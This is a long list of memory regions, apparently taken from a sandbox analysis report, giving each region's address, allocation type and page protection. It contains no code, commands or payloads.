27201BBD000
heap
page read and write
1E63F486000
heap
page read and write
27203642000
heap
page read and write
27201BAF000
heap
page read and write
33CE000
stack
page read and write
34C0000
heap
page read and write
2192E000
stack
page read and write
B749000
direct allocation
page execute and read and write
27201C1A000
heap
page read and write
54D7000
heap
page read and write
1FC202F8000
heap
page read and write
7D7D000
stack
page read and write
6161000
heap
page read and write
60C5000
heap
page read and write
8F90000
trusted library allocation
page read and write
89C4000
heap
page read and write
DF49000
direct allocation
page execute and read and write
50E0000
heap
page read and write
616E000
heap
page read and write
34D0000
trusted library allocation
page read and write
1E639D00000
heap
page read and write
4BCF000
stack
page read and write
7BB0000
trusted library allocation
page read and write
830C000
stack
page read and write
8BD5000
trusted library allocation
page read and write
690E000
stack
page read and write
4DA1000
trusted library allocation
page read and write
7F600000
trusted library allocation
page execute and read and write
7FF7C1400000
trusted library allocation
page read and write
2196E000
stack
page read and write
2ABE000
heap
page read and write
22122000
unclassified section
page execute and read and write
2B60000
heap
page read and write
2AEF000
heap
page read and write
21D12000
unclassified section
page execute and read and write
7400000
trusted library allocation
page read and write
27201E9D000
heap
page read and write
4588000
heap
page read and write
6A1E000
stack
page read and write
13C000
stack
page read and write
7FF7C13BA000
trusted library allocation
page read and write
400000
system
page execute and read and write
23150000
direct allocation
page read and write
616C000
heap
page read and write
2A3C000
stack
page read and write
27201BCA000
heap
page read and write
476000
system
page execute and read and write
27203B1C000
heap
page read and write
B32E97E000
stack
page read and write
1FC202EA000
heap
page read and write
223B6000
heap
page read and write
21EB8000
heap
page read and write
27201BBC000
heap
page read and write
27201C28000
heap
page read and write
7D80000
trusted library allocation
page read and write
B32DAF7000
stack
page read and write
27203B0A000
heap
page read and write
2B19000
heap
page read and write
D3D54FD000
stack
page read and write
362D000
heap
page read and write
2B44000
heap
page read and write
8890000
trusted library allocation
page read and write
21320000
direct allocation
page read and write
476000
system
page execute and read and write
1E639EFD000
heap
page read and write
44F0000
trusted library allocation
page execute and read and write
3590000
heap
page read and write
27201BB0000
heap
page read and write
60D0000
heap
page read and write
7FF7C1202000
trusted library allocation
page read and write
7FF7C12BC000
trusted library allocation
page execute and read and write
FFFBEFE000
stack
page read and write
7FF7C1420000
trusted library allocation
page read and write
1E63F380000
remote allocation
page read and write
1FC06070000
heap
page read and write
90A0000
direct allocation
page read and write
8210000
trusted library allocation
page read and write
1E639E00000
heap
page read and write
222A4000
heap
page read and write
2B30000
heap
page read and write
27201E90000
heap
page read and write
27201C2B000
heap
page read and write
445B000
trusted library allocation
page read and write
27201C1C000
heap
page read and write
4440000
heap
page read and write
8D1B000
stack
page read and write
27201C3A000
heap
page read and write
4458000
trusted library allocation
page read and write
2B2B000
heap
page read and write
22772000
unclassified section
page execute and read and write
27201C1B000
heap
page read and write
1E63A55C000
heap
page read and write
22E82000
unclassified section
page execute and read and write
5130000
direct allocation
page read and write
7F90000
heap
page read and write
1E63F455000
heap
page read and write
27203645000
heap
page read and write
7FBA000
heap
page read and write
7B10000
direct allocation
page read and write
2AB5000
heap
page read and write
54C9000
heap
page read and write
B32DCFE000
unkown
page readonly
3220000
heap
page read and write
34A9000
trusted library allocation
page read and write
85A0000
trusted library allocation
page execute and read and write
22000000
heap
page read and write
C149000
direct allocation
page execute and read and write
1D0000
remote allocation
page read and write
7430000
trusted library allocation
page read and write
2A80000
heap
page read and write
2222D000
heap
page read and write
5203000
trusted library allocation
page read and write
357F000
stack
page read and write
616C000
heap
page read and write
7F340000
trusted library allocation
page execute and read and write
27201BF6000
heap
page read and write
27201C5C000
heap
page read and write
7E80000
trusted library allocation
page read and write
1FC07A10000
trusted library allocation
page read and write
22D60000
unclassified section
page execute and read and write
60D5DBE000
stack
page read and write
616C000
heap
page read and write
7A9A000
heap
page read and write
7C57000
trusted library allocation
page read and write
51A1000
trusted library allocation
page read and write
36CF000
stack
page read and write
8DDD000
stack
page read and write
B32E6FE000
unkown
page readonly
8FF0000
trusted library allocation
page read and write
22100000
unclassified section
page execute and read and write
27201C17000
heap
page read and write
368A000
heap
page read and write
1FC0989B000
trusted library allocation
page read and write
23166000
direct allocation
page execute and read and write
5DD000
stack
page read and write
7B03000
heap
page read and write
2AC0000
heap
page read and write
2B00000
heap
page read and write
2AF2000
heap
page read and write
6180000
heap
page read and write
3470000
trusted library section
page read and write
2DE0000
remote allocation
page read and write
8570000
trusted library allocation
page read and write
5A9A000
trusted library allocation
page read and write
7FF7C14E0000
trusted library allocation
page read and write
4BDA000
heap
page read and write
2950000
heap
page read and write
36F0000
heap
page read and write
7410000
trusted library allocation
page read and write
6161000
heap
page read and write
7FEC000
heap
page read and write
B32F4FB000
stack
page read and write
7FF7C1470000
trusted library allocation
page read and write
7E07000
stack
page read and write
2A60000
trusted library section
page read and write
23105000
unclassified section
page execute and read and write
7FF7C1490000
trusted library allocation
page read and write
2B2F000
heap
page read and write
7DA0000
trusted library allocation
page read and write
1E63A701000
trusted library allocation
page read and write
1E63AD90000
trusted library section
page readonly
27201E9C000
heap
page read and write
27203641000
heap
page read and write
6060000
unclassified section
page execute and read and write
D3D55FE000
unkown
page read and write
27201E95000
heap
page read and write
3010000
remote allocation
page execute and read and write
4C95000
trusted library allocation
page read and write
21F2D000
heap
page read and write
7FF7C12B6000
trusted library allocation
page read and write
C80000
unclassified section
page readonly
27201C0C000
heap
page read and write
4420000
heap
page readonly
22C50000
unclassified section
page execute and read and write
4E4D000
stack
page read and write
CFD000
stack
page read and write
2B1F000
heap
page read and write
27201BCA000
heap
page read and write
60D613B000
stack
page read and write
7210000
trusted library allocation
page read and write
7FF7C120D000
trusted library allocation
page execute and read and write
2ECF000
unkown
page read and write
4D5E000
trusted library allocation
page read and write
22B32000
unclassified section
page execute and read and write
27201C39000
heap
page read and write
6192000
heap
page read and write
7E00000
trusted library allocation
page read and write
27201E9A000
heap
page read and write
3AFF000
remote allocation
page execute and read and write
7EA0000
trusted library allocation
page read and write
2B19000
heap
page read and write
7C60000
heap
page execute and read and write
B32F07E000
stack
page read and write
7FF7C13A0000
trusted library allocation
page read and write
34BA000
trusted library allocation
page execute and read and write
1FC17B4F000
trusted library allocation
page read and write
27201C21000
heap
page read and write
61B5000
heap
page read and write
7E40000
trusted library allocation
page read and write
2AFA000
heap
page read and write
3580000
trusted library allocation
page execute and read and write
5150000
direct allocation
page read and write
7550000
direct allocation
page read and write
2C3A000
heap
page read and write
1FC09777000
trusted library allocation
page read and write
23170000
heap
page read and write
5120000
direct allocation
page read and write
7370000
trusted library allocation
page read and write
288C000
stack
page read and write
2B44000
heap
page read and write
7E90000
trusted library allocation
page execute and read and write
1E63F473000
heap
page read and write
27201BD7000
heap
page read and write
6161000
heap
page read and write
8810000
heap
page read and write
4BD0000
heap
page read and write
1FC07B41000
trusted library allocation
page read and write
1FC17CF5000
trusted library allocation
page read and write
7C20000
trusted library allocation
page read and write
615F000
heap
page read and write
8520000
trusted library allocation
page execute and read and write
60D5D3E000
stack
page read and write
AB0000
heap
page read and write
71D0000
trusted library allocation
page execute and read and write
27201B80000
heap
page read and write
4E27000
trusted library allocation
page read and write
23120000
unclassified section
page execute and read and write
B32E7FE000
unkown
page readonly
6161000
heap
page read and write
2720364C000
heap
page read and write
2720364C000
heap
page read and write
27203AE4000
heap
page read and write
22DF0000
unclassified section
page execute and read and write
1E63A51A000
heap
page read and write
1E63A55B000
heap
page read and write
223B6000
heap
page read and write
27201C2C000
heap
page read and write
291D000
stack
page read and write
2AF1000
heap
page read and write
61B5000
heap
page read and write
615B000
heap
page read and write
614B000
heap
page read and write
8D9E000
stack
page read and write
1FB6C660000
heap
page read and write
2C2E000
stack
page read and write
6180000
heap
page read and write
2AD4000
heap
page read and write
7FF7C1450000
trusted library allocation
page read and write
27203AF3000
heap
page read and write
1FC202FD000
heap
page read and write
227D5000
unclassified section
page execute and read and write
6174000
heap
page read and write
7FF7C1530000
trusted library allocation
page read and write
2AC0000
remote allocation
page read and write
2D10000
unclassified section
page readonly
7173000
heap
page read and write
2AB2000
heap
page read and write
238B000
stack
page read and write
2C30000
heap
page read and write
7FB4000
heap
page read and write
AA0000
heap
page read and write
37EE000
stack
page read and write
71C0000
trusted library allocation
page read and write
1FC07A30000
trusted library allocation
page read and write
60D5AFC000
stack
page read and write
1E63A59D000
heap
page read and write
1E63F2B0000
trusted library allocation
page read and write
45F2000
trusted library allocation
page read and write
217DD000
stack
page read and write
27203649000
heap
page read and write
6180000
heap
page read and write
1FC20127000
heap
page execute and read and write
7E30000
trusted library allocation
page read and write
2B56000
heap
page read and write
3634000
heap
page read and write
1E639EAC000
heap
page read and write
7C30000
trusted library allocation
page execute and read and write
2F7C000
stack
page read and write
27203B0C000
heap
page read and write
FFFBDFF000
stack
page read and write
8FA0000
trusted library allocation
page execute and read and write
7FF7C1430000
trusted library allocation
page read and write
9090000
trusted library allocation
page execute and read and write
1FC1FF94000
heap
page read and write
88FE000
stack
page read and write
798E000
stack
page read and write
1FC20190000
heap
page read and write
2B1D000
heap
page read and write
21DC0000
unclassified section
page execute and read and write
1E63F190000
trusted library allocation
page read and write
1E63B150000
trusted library allocation
page read and write
21CF0000
unclassified section
page execute and read and write
22F30000
unclassified section
page execute and read and write
1E63A55C000
heap
page read and write
1FC17B41000
trusted library allocation
page read and write
374E000
stack
page read and write
794E000
stack
page read and write
2BA9000
trusted library allocation
page read and write
5190000
heap
page execute and read and write
85B0000
direct allocation
page read and write
60D59FE000
stack
page read and write
B32EE7E000
stack
page read and write
27203640000
heap
page read and write
D3D56FF000
stack
page read and write
347F000
unkown
page read and write
22946000
unclassified section
page execute and read and write
333E000
stack
page read and write
27201C0C000
heap
page read and write
2310000
unclassified section
page readonly
2B17000
heap
page read and write
27201BAA000
heap
page read and write
2B80000
trusted library allocation
page read and write
2B0C000
heap
page read and write
8A0E000
heap
page read and write
1FC202E5000
heap
page read and write
7FF7C14A0000
trusted library allocation
page read and write
FFFC3FC000
stack
page read and write
1FC06395000
heap
page read and write
6180000
heap
page read and write
1E63ADB0000
trusted library section
page readonly
54C1000
heap
page read and write
B32EAFE000
unkown
page readonly
2B42000
heap
page read and write
1E639E3F000
heap
page read and write
B32E9FE000
unkown
page readonly
8550000
trusted library allocation
page read and write
940000
heap
page read and write
60C0000
heap
page read and write
7FF7C1210000
trusted library allocation
page read and write
1E63F160000
trusted library allocation
page read and write
8E1C000
stack
page read and write
2B11000
heap
page read and write
349D000
trusted library allocation
page execute and read and write
7DF486A40000
trusted library allocation
page execute and read and write
2930000
heap
page read and write
27201C6E000
heap
page read and write
34D5000
trusted library allocation
page execute and read and write
7E30000
trusted library allocation
page read and write
22856000
unclassified section
page execute and read and write
1FC20303000
heap
page read and write
9840000
direct allocation
page execute and read and write
85C0000
direct allocation
page read and write
21AFB000
stack
page read and write
2B41000
heap
page read and write
730000
heap
page read and write
22960000
unclassified section
page execute and read and write
8E30000
direct allocation
page execute and read and write
1E63A415000
heap
page read and write
8980000
trusted library allocation
page read and write
27AC000
stack
page read and write
1FC063B5000
heap
page read and write
2FB9000
stack
page read and write
1E63F257000
trusted library allocation
page read and write
7B42000
heap
page read and write
6180000
heap
page read and write
60D5B7E000
stack
page read and write
616C000
heap
page read and write
223C0000
heap
page read and write
4F4E000
stack
page read and write
73A0000
trusted library allocation
page read and write
4E8E000
trusted library allocation
page read and write
27201BCA000
heap
page read and write
22AA0000
unclassified section
page execute and read and write
60D6B0F000
unkown
page read and write
3518000
trusted library allocation
page read and write
1FC201B0000
heap
page read and write
1E63F1E0000
trusted library allocation
page read and write
2B2E000
heap
page read and write
27203647000
heap
page read and write
6B60000
direct allocation
page read and write
1E639E76000
heap
page read and write
23142000
unclassified section
page execute and read and write
B71F000
direct allocation
page execute and read and write
29DE000
stack
page read and write
61A1000
trusted library allocation
page read and write
2848000
heap
page read and write
2B13000
heap
page read and write
1FC063B0000
heap
page read and write
2B14000
heap
page read and write
8830000
trusted library allocation
page read and write
1E639C00000
heap
page read and write
21250000
direct allocation
page read and write
2D20000
unclassified section
page readonly
31BC000
heap
page read and write
6161000
heap
page read and write
27201C69000
heap
page read and write
1E63A51A000
heap
page read and write
6AF0000
direct allocation
page read and write
73C0000
trusted library allocation
page read and write
6BEA000
stack
page read and write
27201AD0000
heap
page read and write
5115000
heap
page execute and read and write
4BD1000
heap
page read and write
88BA000
trusted library allocation
page read and write
21C3E000
stack
page read and write
6326000
unclassified section
page execute and read and write
2188E000
stack
page read and write
1FC079F0000
trusted library allocation
page read and write
228B5000
unclassified section
page execute and read and write
4F50000
heap
page read and write
615B000
heap
page read and write
5591000
trusted library allocation
page read and write
27201C27000
heap
page read and write
7E7B000
stack
page read and write
61B5000
heap
page read and write
1E63F44D000
heap
page read and write
1E63F1E0000
trusted library allocation
page read and write
27201E9B000
heap
page read and write
22EA0000
unclassified section
page execute and read and write
4D1B000
trusted library allocation
page read and write
73F0000
trusted library allocation
page read and write
2BB0000
trusted library allocation
page read and write
1E63F3F0000
trusted library allocation
page read and write
1E639F02000
heap
page read and write
There are 1163 hidden memdumps, click here to show them.